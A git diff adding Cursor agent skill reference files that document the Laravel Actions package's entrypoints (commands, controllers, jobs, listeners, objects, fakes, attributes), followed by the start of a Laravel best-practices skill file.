+### `getCommandSignature`
+
+Defines the command signature. Required when registering an action as a command if no `$commandSignature` property is set.
+
+```php
+public function getCommandSignature(): string
+{
+    return 'users:update-role {user_id} {role}';
+}
+```
+
+### `$commandSignature`
+
+Property alternative to `getCommandSignature`.
+
+```php
+public string $commandSignature = 'users:update-role {user_id} {role}';
+```
+
+### `getCommandDescription`
+
+Provides command description.
+
+```php
+public function getCommandDescription(): string
+{
+    return 'Updates the role of a given user.';
+}
+```
+
+### `$commandDescription`
+
+Property alternative to `getCommandDescription`.
+
+```php
+public string $commandDescription = 'Updates the role of a given user.';
+```
+
+### `getCommandHelp`
+
+Provides additional help text shown with `--help`.
+
+```php
+public function getCommandHelp(): string
+{
+    return 'My help message.';
+}
+```
+
+### `$commandHelp`
+
+Property alternative to `getCommandHelp`.
+
+```php
+public string $commandHelp = 'My help message.';
+```
+
+### `isCommandHidden`
+
+Defines whether command should be hidden from artisan list. Default is `false`.
+
+```php
+public function isCommandHidden(): bool
+{
+    return true;
+}
+```
+
+### `$commandHidden`
+
+Property alternative to `isCommandHidden`.
+
+```php
+public bool $commandHidden = true;
+```
+
+## Examples
+
+### Register in console kernel
+
+```php
+// app/Console/Kernel.php
+protected $commands = [
+    UpdateUserRole::class,
+];
+```
+
+### Focused command test
+
+```php
+$this->artisan('users:update-role 1 admin')
+    ->expectsOutput('Done!')
+    ->assertSuccessful();
+```
+
+## Checklist
+
+- `use Illuminate\Console\Command;` is imported.
+- Signature/options/arguments are documented.
+- Command test verifies invocation and output.
+
+## Common pitfalls
+
+- Mixing command I/O with domain logic in `handle(...)`.
+- Missing/ambiguous command signature.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-command.html
\ No newline at end of file
diff --git a/.cursor/skills/laravel-actions/references/controller.md b/.cursor/skills/laravel-actions/references/controller.md
new file mode 100644
index 000000000..d48c34df8
--- /dev/null
+++ b/.cursor/skills/laravel-actions/references/controller.md
@@ -0,0 +1,339 @@
+# Controller Entrypoint (`asController`)
+
+## Scope
+
+Use this reference when exposing an action through HTTP routes.
+
+## Recap
+
+- Documents controller lifecycle around `asController(...)` and response adapters.
+- Covers routing patterns, middleware, and optional in-action `routes()` registration.
+- Summarizes validation/authorization hooks used by `ActionRequest`.
+- Provides extension points for JSON/HTML responses and failure customization.
+
+## Recommended pattern
+
+- Route directly to action class when appropriate.
+- Keep HTTP adaptation in controller methods (`asController`, `jsonResponse`, `htmlResponse`).
+- Keep domain logic in `handle(...)`.
+
+## Methods provided (`AsController` trait)
+
+### `__invoke`
+
+Required so Laravel can register the action class as an invokable controller.
+
+```php
+$action($someArguments);
+
+// Equivalent to:
+$action->handle($someArguments);
+```
+
+If the method does not exist, Laravel route registration fails for invokable controllers.
+
+```php
+// Illuminate\Routing\RouteAction
+protected static function makeInvokable($action)
+{
+    if (! method_exists($action, '__invoke')) {
+        throw new UnexpectedValueException("Invalid route action: [{$action}].");
+    }
+
+    return $action.'@__invoke';
+}
+```
+
+If you need your own `__invoke`, alias the trait implementation:
+
+```php
+class MyAction
+{
+    use AsAction {
+        __invoke as protected invokeFromLaravelActions;
+    }
+
+    public function __invoke()
+    {
+        // Custom behavior...
+    }
+}
+```
+
+## Methods used (`ControllerDecorator` + `ActionRequest`)
+
+### `asController`
+
+Called when used as invokable controller. If missing, it falls back to `handle(...)`.
+
+```php
+public function asController(User $user, Request $request): Response
+{
+    $article = $this->handle(
+        $user,
+        $request->get('title'),
+        $request->get('body')
+    );
+
+    return redirect()->route('articles.show', [$article]);
+}
+```
+
+### `jsonResponse`
+
+Called after `asController` when request expects JSON.
+
+```php
+public function jsonResponse(Article $article, Request $request): ArticleResource
+{
+    return new ArticleResource($article);
+}
+```
+
+### `htmlResponse`
+
+Called after `asController` when request expects HTML.
+
+```php
+public function htmlResponse(Article $article, Request $request): Response
+{
+    return redirect()->route('articles.show', [$article]);
+}
+```
+
+### `getControllerMiddleware`
+
+Adds middleware directly on the action controller.
+
+```php
+public function getControllerMiddleware(): array
+{
+    return ['auth', MyCustomMiddleware::class];
+}
+```
+
+### `routes`
+
+Defines routes directly in the action.
+
+```php
+public static function routes(Router $router)
+{
+    $router->get('author/{author}/articles', static::class);
+}
+```
+
+To enable this, register routes from actions in a service provider:
+
+```php
+use Lorisleiva\Actions\Facades\Actions;
+
+Actions::registerRoutes();
+Actions::registerRoutes('app/MyCustomActionsFolder');
+Actions::registerRoutes([
+    'app/Authentication',
+    'app/Billing',
+    'app/TeamManagement',
+]);
+```
+
+### `prepareForValidation`
+
+Called before authorization and validation are resolved.
+
+```php
+public function prepareForValidation(ActionRequest $request): void
+{
+    $request->merge(['some' => 'additional data']);
+}
+```
+
+### `authorize`
+
+Defines authorization logic.
+
+```php
+public function authorize(ActionRequest $request): bool
+{
+    return $request->user()->role === 'author';
+}
+```
+
+You can also return gate responses:
+
+```php
+use Illuminate\Auth\Access\Response;
+
+public function authorize(ActionRequest $request): Response
+{
+    if ($request->user()->role !== 'author') {
+        return Response::deny('You must be an author to create a new article.');
+    }
+
+    return Response::allow();
+}
+```
+
+### `rules`
+
+Defines validation rules.
+
+```php
+public function rules(): array
+{
+    return [
+        'title' => ['required', 'min:8'],
+        'body' => ['required', IsValidMarkdown::class],
+    ];
+}
+```
+
+### `withValidator`
+
+Adds custom validation logic with an after hook.
+
+```php
+use Illuminate\Validation\Validator;
+
+public function withValidator(Validator $validator, ActionRequest $request): void
+{
+    $validator->after(function (Validator $validator) use ($request) {
+        if (! Hash::check($request->get('current_password'), $request->user()->password)) {
+            $validator->errors()->add('current_password', 'Wrong password.');
+        }
+    });
+}
+```
+
+### `afterValidator`
+
+Alternative to add post-validation checks.
+
+```php
+use Illuminate\Validation\Validator;
+
+public function afterValidator(Validator $validator, ActionRequest $request): void
+{
+    if (! Hash::check($request->get('current_password'), $request->user()->password)) {
+        $validator->errors()->add('current_password', 'Wrong password.');
+    }
+}
+```
+
+### `getValidator`
+
+Provides a custom validator instead of default rules pipeline.
+
+```php
+use Illuminate\Validation\Factory;
+use Illuminate\Validation\Validator;
+
+public function getValidator(Factory $factory, ActionRequest $request): Validator
+{
+    return $factory->make($request->only('title', 'body'), [
+        'title' => ['required', 'min:8'],
+        'body' => ['required', IsValidMarkdown::class],
+    ]);
+}
+```
+
+### `getValidationData`
+
+Defines which data is validated (default: `$request->all()`).
+
+```php
+public function getValidationData(ActionRequest $request): array
+{
+    return $request->all();
+}
+```
+
+### `getValidationMessages`
+
+Custom validation error messages.
+
+```php
+public function getValidationMessages(): array
+{
+    return [
+        'title.required' => 'Looks like you forgot the title.',
+        'body.required' => 'Is that really all you have to say?',
+    ];
+}
+```
+
+### `getValidationAttributes`
+
+Human-friendly names for request attributes.
+
+```php
+public function getValidationAttributes(): array
+{
+    return [
+        'title' => 'headline',
+        'body' => 'content',
+    ];
+}
+```
+
+### `getValidationRedirect`
+
+Custom redirect URL on validation failure.
+
+```php
+public function getValidationRedirect(UrlGenerator $url): string
+{
+    return $url->to('/my-custom-redirect-url');
+}
+```
+
+### `getValidationErrorBag`
+
+Custom error bag name on validation failure (default: `default`).
+
+```php
+public function getValidationErrorBag(): string
+{
+    return 'my_custom_error_bag';
+}
+```
+
+### `getValidationFailure`
+
+Override validation failure behavior.
+
+```php
+public function getValidationFailure(): void
+{
+    throw new MyCustomValidationException();
+}
+```
+
+### `getAuthorizationFailure`
+
+Override authorization failure behavior.
+
+```php
+public function getAuthorizationFailure(): void
+{
+    throw new MyCustomAuthorizationException();
+}
+```
+
+## Checklist
+
+- Route wiring points to the action class.
+- `asController(...)` delegates to `handle(...)`.
+- Validation/authorization methods are explicit where needed.
+- Response mapping is split by channel (`jsonResponse`, `htmlResponse`) when useful.
+- HTTP tests cover both success and validation/authorization failure branches.
+
+## Common pitfalls
+
+- Putting response/redirect logic in `handle(...)`.
+- Duplicating business rules in `asController(...)` instead of delegating.
+- Assuming action route discovery works without `Actions::registerRoutes(...)` when using in-action `routes()`.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-controller.html
\ No newline at end of file
diff --git a/.cursor/skills/laravel-actions/references/job.md b/.cursor/skills/laravel-actions/references/job.md
new file mode 100644
index 000000000..b4c7cbea0
--- /dev/null
+++ b/.cursor/skills/laravel-actions/references/job.md
@@ -0,0 +1,425 @@
+# Job Entrypoint (`dispatch`, `asJob`)
+
+## Scope
+
+Use this reference when running an action through queues.
+
+## Recap
+
+- Lists async/sync dispatch helpers and conditional dispatch variants.
+- Covers job wrapping/chaining with `makeJob`, `makeUniqueJob`, and `withChain`.
+- Documents queue assertion helpers for tests (`assertPushed*`).
+- Summarizes `JobDecorator` hooks/properties for retries, uniqueness, timeout, and failure handling.
+
+## Recommended pattern
+
+- Dispatch with `Action::dispatch(...)` for async execution.
+- Keep queue-specific orchestration in `asJob(...)`.
+- Keep reusable business logic in `handle(...)`.
+
+## Methods provided (`AsJob` trait)
+
+### `dispatch`
+
+Dispatches the action asynchronously.
+
+```php
+SendTeamReportEmail::dispatch($team);
+```
+
+### `dispatchIf`
+
+Dispatches asynchronously only if condition is met.
+
+```php
+SendTeamReportEmail::dispatchIf($team->plan === 'premium', $team);
+```
+
+### `dispatchUnless`
+
+Dispatches asynchronously unless condition is met.
+
+```php
+SendTeamReportEmail::dispatchUnless($team->plan === 'free', $team);
+```
+
+### `dispatchSync`
+
+Dispatches synchronously.
+
+```php
+SendTeamReportEmail::dispatchSync($team);
+```
+
+### `dispatchNow`
+
+Alias of `dispatchSync`.
+
+```php
+SendTeamReportEmail::dispatchNow($team);
+```
+
+### `dispatchAfterResponse`
+
+Dispatches synchronously after the HTTP response is sent.
+
+```php
+SendTeamReportEmail::dispatchAfterResponse($team);
+```
+
+### `makeJob`
+
+Creates a `JobDecorator` wrapper. Useful with `dispatch(...)` helper or chains.
+
+```php
+dispatch(SendTeamReportEmail::makeJob($team));
+```
+
+### `makeUniqueJob`
+
+Creates a `UniqueJobDecorator` wrapper. Usually automatic with `ShouldBeUnique`, but can be forced.
+
+```php
+dispatch(SendTeamReportEmail::makeUniqueJob($team));
+```
+
+### `withChain`
+
+Attaches jobs to run after successful processing.
+
+```php
+$chain = [
+    OptimizeTeamReport::makeJob($team),
+    SendTeamReportEmail::makeJob($team),
+];
+
+CreateNewTeamReport::withChain($chain)->dispatch($team);
+```
+
+Equivalent using `Bus::chain(...)`:
+
+```php
+use Illuminate\Support\Facades\Bus;
+
+Bus::chain([
+    CreateNewTeamReport::makeJob($team),
+    OptimizeTeamReport::makeJob($team),
+    SendTeamReportEmail::makeJob($team),
+])->dispatch();
+```
+
+Chain assertion example:
+
+```php
+use Illuminate\Support\Facades\Bus;
+
+Bus::fake();
+
+Bus::assertChained([
+    CreateNewTeamReport::makeJob($team),
+    OptimizeTeamReport::makeJob($team),
+    SendTeamReportEmail::makeJob($team),
+]);
+```
+
+### `assertPushed`
+
+Asserts the action was queued.
+
+```php
+use Illuminate\Support\Facades\Queue;
+
+Queue::fake();
+
+SendTeamReportEmail::assertPushed();
+SendTeamReportEmail::assertPushed(3);
+SendTeamReportEmail::assertPushed($callback);
+SendTeamReportEmail::assertPushed(3, $callback);
+```
+
+`$callback` receives:
+- Action instance.
+- Dispatched arguments.
+- `JobDecorator` instance.
+- Queue name.
+
+### `assertNotPushed`
+
+Asserts the action was not queued.
+
+```php
+use Illuminate\Support\Facades\Queue;
+
+Queue::fake();
+
+SendTeamReportEmail::assertNotPushed();
+SendTeamReportEmail::assertNotPushed($callback);
+```
+
+### `assertPushedOn`
+
+Asserts the action was queued on a specific queue.
+
+```php
+use Illuminate\Support\Facades\Queue;
+
+Queue::fake();
+
+SendTeamReportEmail::assertPushedOn('reports');
+SendTeamReportEmail::assertPushedOn('reports', 3);
+SendTeamReportEmail::assertPushedOn('reports', $callback);
+SendTeamReportEmail::assertPushedOn('reports', 3, $callback);
+```
+
+## Methods used (`JobDecorator`)
+
+### `asJob`
+
+Called when dispatched as a job. Falls back to `handle(...)` if missing.
+
+```php
+class SendTeamReportEmail
+{
+    use AsAction;
+
+    public function handle(Team $team, bool $fullReport = false): void
+    {
+        // Prepare report and send it to all $team->users.
+    }
+
+    public function asJob(Team $team): void
+    {
+        $this->handle($team, true);
+    }
+}
+```
+
+### `getJobMiddleware`
+
+Adds middleware to the queued action.
+
+```php
+public function getJobMiddleware(array $parameters): array
+{
+    return [new RateLimited('reports')];
+}
+```
+
+### `configureJob`
+
+Configures `JobDecorator` options.
+
+```php
+use Lorisleiva\Actions\Decorators\JobDecorator;
+
+public function configureJob(JobDecorator $job): void
+{
+    $job->onConnection('my_connection')
+        ->onQueue('my_queue')
+        ->through(['my_middleware'])
+        ->chain(['my_chain'])
+        ->delay(60);
+}
+```
+
+### `$jobConnection`
+
+Defines queue connection.
+
+```php
+public string $jobConnection = 'my_connection';
+```
+
+### `$jobQueue`
+
+Defines queue name.
+
+```php
+public string $jobQueue = 'my_queue';
+```
+
+### `$jobTries`
+
+Defines max attempts.
+
+```php
+public int $jobTries = 10;
+```
+
+### `$jobMaxExceptions`
+
+Defines max unhandled exceptions before failure.
+
+```php
+public int $jobMaxExceptions = 3;
+```
+
+### `$jobBackoff`
+
+Defines retry delay seconds.
+
+```php
+public int $jobBackoff = 60;
+```
+
+### `getJobBackoff`
+
+Defines retry delay (int or per-attempt array).
+
+```php
+public function getJobBackoff(): int
+{
+    return 60;
+}
+
+public function getJobBackoff(): array
+{
+    return [30, 60, 120];
+}
+```
+
+### `$jobTimeout`
+
+Defines timeout in seconds.
+
+```php
+public int $jobTimeout = 60 * 30;
+```
+
+### `$jobRetryUntil`
+
+Defines timestamp retry deadline.
+
+```php
+public int $jobRetryUntil = 1610191764;
+```
+
+### `getJobRetryUntil`
+
+Defines retry deadline as `DateTime`.
+
+```php
+public function getJobRetryUntil(): DateTime
+{
+    return now()->addMinutes(30);
+}
+```
+
+### `getJobDisplayName`
+
+Customizes queued job display name.
+
+```php
+public function getJobDisplayName(): string
+{
+    return 'Send team report email';
+}
+```
+
+### `getJobTags`
+
+Adds queue tags.
+
+```php
+public function getJobTags(Team $team): array
+{
+    return ['report', 'team:'.$team->id];
+}
+```
+
+### `getJobUniqueId`
+
+Defines uniqueness key when using `ShouldBeUnique`.
+
+```php
+public function getJobUniqueId(Team $team): int
+{
+    return $team->id;
+}
+```
+
+### `$jobUniqueId`
+
+Static uniqueness key alternative.
+
+```php
+public string $jobUniqueId = 'some_static_key';
+```
+
+### `getJobUniqueFor`
+
+Defines uniqueness lock duration in seconds.
+
+```php
+public function getJobUniqueFor(Team $team): int
+{
+    return $team->role === 'premium' ? 1800 : 3600;
+}
+```
+
+### `$jobUniqueFor`
+
+Property alternative for uniqueness lock duration.
+
+```php
+public int $jobUniqueFor = 3600;
+```
+
+### `getJobUniqueVia`
+
+Defines cache driver used for uniqueness lock.
+
+```php
+public function getJobUniqueVia()
+{
+    return Cache::driver('redis');
+}
+```
+
+### `$jobDeleteWhenMissingModels`
+
+Property alternative for missing model handling.
+
+```php
+public bool $jobDeleteWhenMissingModels = true;
+```
+
+### `getJobDeleteWhenMissingModels`
+
+Defines whether jobs with missing models are deleted.
+
+```php
+public function getJobDeleteWhenMissingModels(): bool
+{
+    return true;
+}
+```
+
+### `jobFailed`
+
+Handles job failure. Receives exception and dispatched parameters.
+
+```php
+public function jobFailed(?Throwable $e, ...$parameters): void
+{
+    // Notify users, report errors, trigger compensations...
+}
+```
+
+## Checklist
+
+- Async/sync dispatch method matches use-case (`dispatch`, `dispatchSync`, `dispatchAfterResponse`).
+- Queue config is explicit when needed (`$jobConnection`, `$jobQueue`, `configureJob`).
+- Retry/backoff/timeout policies are intentional.
+- `asJob(...)` delegates to `handle(...)` unless queue-specific branching is required.
+- Queue tests use `Queue::fake()` and action assertions (`assertPushed*`).
+
+## Common pitfalls
+
+- Embedding domain logic only in `asJob(...)`.
+- Forgetting uniqueness/timeout/retry controls on heavy jobs.
+- Missing queue-specific assertions in tests.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-job.html
\ No newline at end of file
diff --git a/.cursor/skills/laravel-actions/references/listener.md b/.cursor/skills/laravel-actions/references/listener.md
new file mode 100644
index 000000000..c5233001d
--- /dev/null
+++ b/.cursor/skills/laravel-actions/references/listener.md
@@ -0,0 +1,81 @@
+# Listener Entrypoint (`asListener`)
+
+## Scope
+
+Use this reference when wiring actions to domain/application events.
+
+## Recap
+
+- Shows how listener execution maps event payloads into `handle(...)` arguments.
+- Describes `asListener(...)` fallback behavior and adaptation role.
+- Includes event registration example for provider wiring.
+- Emphasizes test focus on dispatch and action interaction.
+
+## Recommended pattern
+
+- Register action listener in `EventServiceProvider` (or project equivalent).
+- Use `asListener(Event $event)` for event adaptation.
+- Delegate core logic to `handle(...)`.
+
+## Methods used (`ListenerDecorator`)
+
+### `asListener`
+
+Called when executed as an event listener. If missing, it falls back to `handle(...)`.
+
+```php
+class SendOfferToNearbyDrivers
+{
+    use AsAction;
+
+    public function handle(Address $source, Address $destination): void
+    {
+        // ...
+    }
+
+    public function asListener(TaxiRequested $event): void
+    {
+        $this->handle($event->source, $event->destination);
+    }
+}
+```
+
+## Examples
+
+### Event registration
+
+```php
+// app/Providers/EventServiceProvider.php
+protected $listen = [
+    TaxiRequested::class => [
+        SendOfferToNearbyDrivers::class,
+    ],
+];
+```
+
+### Focused listener test
+
+```php
+use Illuminate\Support\Facades\Event;
+
+Event::fake();
+
+TaxiRequested::dispatch($source, $destination);
+
+Event::assertDispatched(TaxiRequested::class);
+```
+
+## Checklist
+
+- Event-to-listener mapping is registered.
+- Listener method signature matches event contract.
+- Listener tests verify dispatch and action interaction.
+
+## Common pitfalls
+
+- Assuming automatic listener registration when explicit mapping is required.
+- Re-implementing business logic in `asListener(...)`.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-listener.html
\ No newline at end of file
diff --git a/.cursor/skills/laravel-actions/references/object.md b/.cursor/skills/laravel-actions/references/object.md
new file mode 100644
index 000000000..6a90be4d5
--- /dev/null
+++ b/.cursor/skills/laravel-actions/references/object.md
@@ -0,0 +1,118 @@
+# Object Entrypoint (`run`, `make`, DI)
+
+## Scope
+
+Use this reference when the action is invoked as a plain object.
+
+## Recap
+
+- Explains object-style invocation with `make`, `run`, `runIf`, `runUnless`.
+- Clarifies when to use static helpers versus DI/manual invocation.
+- Includes minimal examples for direct run and service-level injection.
+- Highlights boundaries: business logic stays in `handle(...)`.
+
+## Recommended pattern
+
+- Keep core business logic in `handle(...)`.
+- Prefer `Action::run(...)` for readability.
+- Use `Action::make()->handle(...)` or DI only when needed.
+
+## Methods provided
+
+### `make`
+
+Resolves the action from the container.
+
+```php
+PublishArticle::make();
+
+// Equivalent to:
+app(PublishArticle::class);
+```
+
+### `run`
+
+Resolves and executes the action.
+
+```php
+PublishArticle::run($articleId);
+
+// Equivalent to:
+PublishArticle::make()->handle($articleId);
+```
+
+### `runIf`
+
+Resolves and executes the action only if the condition is met.
+
+```php
+PublishArticle::runIf($shouldPublish, $articleId);
+
+// Equivalent mental model:
+if ($shouldPublish) {
+    PublishArticle::run($articleId);
+}
+```
+
+### `runUnless`
+
+Resolves and executes the action only if the condition is not met.
+
+```php
+PublishArticle::runUnless($alreadyPublished, $articleId);
+
+// Equivalent mental model:
+if (! $alreadyPublished) {
+    PublishArticle::run($articleId);
+}
+```
+
+## Checklist
+
+- Input/output types are explicit.
+- `handle(...)` has no transport concerns.
+- Business behavior is covered by direct `handle(...)` tests.
+
+## Common pitfalls
+
+- Putting HTTP/CLI/queue concerns in `handle(...)`.
+- Calling adapters from `handle(...)` instead of the reverse.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-object.html
+
+## Examples
+
+### Minimal object-style invocation
+
+```php
+final class PublishArticle
+{
+    use AsAction;
+
+    public function handle(int $articleId): bool
+    {
+        // Domain logic...
+        return true;
+    }
+}
+
+$published = PublishArticle::run(42);
+```
+
+### Dependency injection invocation
+
+```php
+final class ArticleService
+{
+    public function __construct(
+        private PublishArticle $publishArticle
+    ) {}
+
+    public function publish(int $articleId): bool
+    {
+        return $this->publishArticle->handle($articleId);
+    }
+}
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-actions/references/testing-fakes.md b/.cursor/skills/laravel-actions/references/testing-fakes.md
new file mode 100644
index 000000000..97766e6ce
--- /dev/null
+++ b/.cursor/skills/laravel-actions/references/testing-fakes.md
@@ -0,0 +1,160 @@
+# Testing and Action Fakes
+
+## Scope
+
+Use this reference when isolating action orchestration in tests.
+
+## Recap
+
+- Summarizes all `AsFake` helpers (`mock`, `partialMock`, `spy`, `shouldRun`, `shouldNotRun`, `allowToRun`).
+- Clarifies when to assert execution versus non-execution.
+- Covers fake lifecycle checks/reset (`isFake`, `clearFake`).
+- Provides branch-oriented test examples for orchestration confidence.
+
+## Core methods
+
+- `mock()`
+- `partialMock()`
+- `spy()`
+- `shouldRun()`
+- `shouldNotRun()`
+- `allowToRun()`
+- `isFake()`
+- `clearFake()`
+
+## Recommended pattern
+
+- Test `handle(...)` directly for business rules.
+- Test entrypoints for wiring/orchestration.
+- Fake only at the boundary under test.
+
+## Methods provided (`AsFake` trait)
+
+### `mock`
+
+Swaps the action with a full mock.
+
+```php
+FetchContactsFromGoogle::mock()
+    ->shouldReceive('handle')
+    ->with(42)
+    ->andReturn(['Loris', 'Will', 'Barney']);
+```
+
+### `partialMock`
+
+Swaps the action with a partial mock.
+
+```php
+FetchContactsFromGoogle::partialMock()
+    ->shouldReceive('fetch')
+    ->with('some_google_identifier')
+    ->andReturn(['Loris', 'Will', 'Barney']);
+```
+
+### `spy`
+
+Swaps the action with a spy.
+
+```php
+$spy = FetchContactsFromGoogle::spy()
+    ->allows('handle')
+    ->andReturn(['Loris', 'Will', 'Barney']);
+
+// ...
+
+$spy->shouldHaveReceived('handle')->with(42);
+```
+
+### `shouldRun`
+
+Helper adding expectation on `handle`.
+
+```php
+FetchContactsFromGoogle::shouldRun();
+
+// Equivalent to:
+FetchContactsFromGoogle::mock()->shouldReceive('handle');
+```
+
+### `shouldNotRun`
+
+Helper adding negative expectation on `handle`.
+
+```php
+FetchContactsFromGoogle::shouldNotRun();
+
+// Equivalent to:
+FetchContactsFromGoogle::mock()->shouldNotReceive('handle');
+```
+
+### `allowToRun`
+
+Helper allowing `handle` on a spy.
+
+```php
+$spy = FetchContactsFromGoogle::allowToRun()
+    ->andReturn(['Loris', 'Will', 'Barney']);
+
+// ...
+
+$spy->shouldHaveReceived('handle')->with(42);
+```
+
+### `isFake`
+
+Returns whether the action has been swapped with a fake.
+
+```php
+FetchContactsFromGoogle::isFake(); // false
+FetchContactsFromGoogle::mock();
+FetchContactsFromGoogle::isFake(); // true
+```
+
+### `clearFake`
+
+Clears the fake instance, if any.
+
+```php
+FetchContactsFromGoogle::mock();
+FetchContactsFromGoogle::isFake(); // true
+FetchContactsFromGoogle::clearFake();
+FetchContactsFromGoogle::isFake(); // false
+```
+
+## Examples
+
+### Orchestration test
+
+```php
+it('runs sync contacts for premium teams', function () {
+    SyncGoogleContacts::shouldRun()->once()->with(42)->andReturnTrue();
+
+    ImportTeamContacts::run(42, isPremium: true);
+});
+```
+
+### Guard-clause test
+
+```php
+it('does not run sync when integration is disabled', function () {
+    SyncGoogleContacts::shouldNotRun();
+
+    ImportTeamContacts::run(42, integrationEnabled: false);
+});
+```
+
+## Checklist
+
+- Assertions verify call intent and argument contracts.
+- Fakes are cleared when leakage risk exists.
+- Branch tests use `shouldRun()` / `shouldNotRun()` where clearer.
+
+## Common pitfalls
+
+- Over-mocking and losing behavior confidence.
+- Asserting only dispatch, not business correctness.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-fake.html
\ No newline at end of file
diff --git a/.cursor/skills/laravel-actions/references/troubleshooting.md b/.cursor/skills/laravel-actions/references/troubleshooting.md
new file mode 100644
index 000000000..cf6a5800f
--- /dev/null
+++ b/.cursor/skills/laravel-actions/references/troubleshooting.md
@@ -0,0 +1,33 @@
+# Troubleshooting
+
+## Scope
+
+Use this reference when action wiring behaves unexpectedly.
+
+## Recap
+
+- Provides a fast triage flow for routing, queueing, events, and command wiring.
+- Lists recurring failure patterns and where to check first.
+- Encourages reproducing issues with focused tests before broad debugging.
+- Separates wiring diagnostics from domain logic verification.
+
+## Fast checks
+
+- Action class uses `AsAction`.
+- Namespace and autoloading are correct.
+- Entrypoint wiring (route, queue, event, command) is registered.
+- Method signatures and argument types match caller expectations.
+
+## Failure patterns
+
+- Controller route points to wrong class.
+- Queue worker/config mismatch.
+- Listener mapping not loaded.
+- Command signature mismatch.
+- Command not registered in the console kernel.
+
+## Debug checklist
+
+- Reproduce with a focused failing test.
+- Validate wiring layer first, then domain behavior.
+- Isolate dependencies with fakes/spies where appropriate.
\ No newline at end of file
diff --git a/.cursor/skills/laravel-actions/references/with-attributes.md b/.cursor/skills/laravel-actions/references/with-attributes.md
new file mode 100644
index 000000000..1b28cf2cb
--- /dev/null
+++ b/.cursor/skills/laravel-actions/references/with-attributes.md
@@ -0,0 +1,189 @@
+# With Attributes (`WithAttributes` trait)
+
+## Scope
+
+Use this reference when an action stores and validates input via internal attributes instead of method arguments.
+
+## Recap
+
+- Documents attribute lifecycle APIs (`setRawAttributes`, `fill`, `fillFromRequest`, readers/writers).
+- Clarifies behavior of key collisions (`fillFromRequest`: request data wins over route params).
+- Lists validation/authorization hooks reused from controller validation pipeline.
+- Includes end-to-end example from fill to `validateAttributes()` and `handle(...)`.
+
+## Methods provided (`WithAttributes` trait)
+
+### `setRawAttributes`
+
+Replaces all attributes with the provided payload.
+
+```php
+$action->setRawAttributes([
+    'key' => 'value',
+]);
+```
+
+### `fill`
+
+Merges provided attributes into existing attributes.
+
+```php
+$action->fill([
+    'key' => 'value',
+]);
+```
+
+### `fillFromRequest`
+
+Merges request input and route parameters into attributes. Request input has priority over route parameters when keys collide.
+
+```php
+$action->fillFromRequest($request);
+```
+
+### `all`
+
+Returns all attributes.
+
+```php
+$action->all();
+```
+
+### `only`
+
+Returns attributes matching the provided keys.
+
+```php
+$action->only('title', 'body');
+```
+
+### `except`
+
+Returns attributes excluding the provided keys.
+
+```php
+$action->except('body');
+```
+
+### `has`
+
+Returns whether an attribute exists for the given key.
+
+```php
+$action->has('title');
+```
+
+### `get`
+
+Returns the attribute value by key, with optional default.
+
+```php
+$action->get('title');
+$action->get('title', 'Untitled');
+```
+
+### `set`
+
+Sets an attribute value by key.
+
+```php
+$action->set('title', 'My blog post');
+```
+
+### `__get`
+
+Accesses attributes as object properties.
+
+```php
+$action->title;
+```
+
+### `__set`
+
+Updates attributes as object properties.
+
+```php
+$action->title = 'My blog post';
+```
+
+### `__isset`
+
+Checks attribute existence as object properties.
+
+```php
+isset($action->title);
+```
+
+### `validateAttributes`
+
+Runs authorization and validation using action attributes and returns validated data.
+
+```php
+$validatedData = $action->validateAttributes();
+```
+
+## Methods used (`AttributeValidator`)
+
+`WithAttributes` uses the same authorization/validation hooks as `AsController`:
+
+- `prepareForValidation`
+- `authorize`
+- `rules`
+- `withValidator`
+- `afterValidator`
+- `getValidator`
+- `getValidationData`
+- `getValidationMessages`
+- `getValidationAttributes`
+- `getValidationRedirect`
+- `getValidationErrorBag`
+- `getValidationFailure`
+- `getAuthorizationFailure`
+
+## Example
+
+```php
+class CreateArticle
+{
+    use AsAction;
+    use WithAttributes;
+
+    public function rules(): array
+    {
+        return [
+            'title' => ['required', 'string', 'min:8'],
+            'body' => ['required', 'string'],
+        ];
+    }
+
+    public function handle(array $attributes): Article
+    {
+        return Article::create($attributes);
+    }
+}
+
+$action = CreateArticle::make()->fill([
+    'title' => 'My first post',
+    'body' => 'Hello world',
+]);
+
+$validated = $action->validateAttributes();
+$article = $action->handle($validated);
+```
+
+## Checklist
+
+- Attribute keys are explicit and stable.
+- Validation rules match expected attribute shape.
+- `validateAttributes()` is called before side effects when needed.
+- Validation/authorization hooks are tested in focused unit tests.
+
+## Common pitfalls
+
+- Mixing attribute-based and argument-based flows inconsistently in the same action.
+- Assuming route params override request input in `fillFromRequest` (they do not).
+- Skipping `validateAttributes()` when using external input.
+
+## References
+
+- https://www.laravelactions.com/2.x/with-attributes.html
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/SKILL.md b/.cursor/skills/laravel-best-practices/SKILL.md
new file mode 100644
index 000000000..99018f3ae
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/SKILL.md
@@ -0,0 +1,190 @@
+---
+name: laravel-best-practices
+description: "Apply this skill whenever writing, reviewing, or refactoring Laravel PHP code. This includes creating or modifying controllers, models, migrations, form requests, policies, jobs, scheduled commands, service classes, and Eloquent queries. Triggers for N+1 and query performance issues, caching strategies, authorization and security patterns, validation, error handling, queue and job configuration, route definitions, and architectural decisions. Also use for Laravel code reviews and refactoring existing Laravel code to follow best practices. Covers any task involving Laravel backend PHP code patterns."
+license: MIT
+metadata:
+  author: laravel
+---
+
+# Laravel Best Practices
+
+Best practices for Laravel, prioritized by impact. Each rule teaches what to do and why. For exact API syntax, verify with `search-docs`.
+
+## Consistency First
+
+Before applying any rule, check what the application already does. Laravel offers multiple valid approaches — the best choice is the one the codebase already uses, even if another pattern would be theoretically better. Inconsistency is worse than a suboptimal pattern.
+
+Check sibling files, related controllers, models, or tests for established patterns. If one exists, follow it — don't introduce a second way. These rules are defaults for when no pattern exists yet, not overrides.
+
+## Quick Reference
+
+### 1. Database Performance → `rules/db-performance.md`
+
+- Eager load with `with()` to prevent N+1 queries
+- Enable `Model::preventLazyLoading()` in development
+- Select only needed columns, avoid `SELECT *`
+- `chunk()` / `chunkById()` for large datasets
+- Index columns used in `WHERE`, `ORDER BY`, `JOIN`
+- `withCount()` instead of loading relations to count
+- `cursor()` for memory-efficient read-only iteration
+- Never query in Blade templates
